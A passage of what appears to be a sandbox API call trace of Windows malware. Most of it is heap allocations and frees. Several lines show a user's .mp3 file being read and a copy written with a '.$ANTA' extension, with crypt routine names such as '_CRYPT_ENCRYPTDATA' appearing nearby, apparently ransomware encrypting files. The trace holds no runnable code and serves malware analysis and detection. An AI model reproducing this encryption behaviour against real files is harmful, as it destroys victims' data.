dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0111.953] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.953] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.953] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0111.953] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0111.953] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0111.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0111.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0111.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a49d0 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0111.955] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\d4swwmt- hf4jge2.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.956] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0111.956] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0111.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0111.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0111.960] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0111.960] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0xfc5a, lpOverlapped=0x0) returned 1 [0111.962] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0111.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0111.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfc5a) returned 0x4516010 [0111.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0111.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0111.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0111.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfc5a) returned 0x4525c78 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.966] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfc5a) returned 0x4516010 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.966] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0111.966] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0111.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0111.966] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfc5a) returned 0x4516010 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0111.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfc5a) returned 0x45358e0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0111.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0111.968] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0111.968] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0111.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0111.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0111.969] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0111.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0111.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.969] 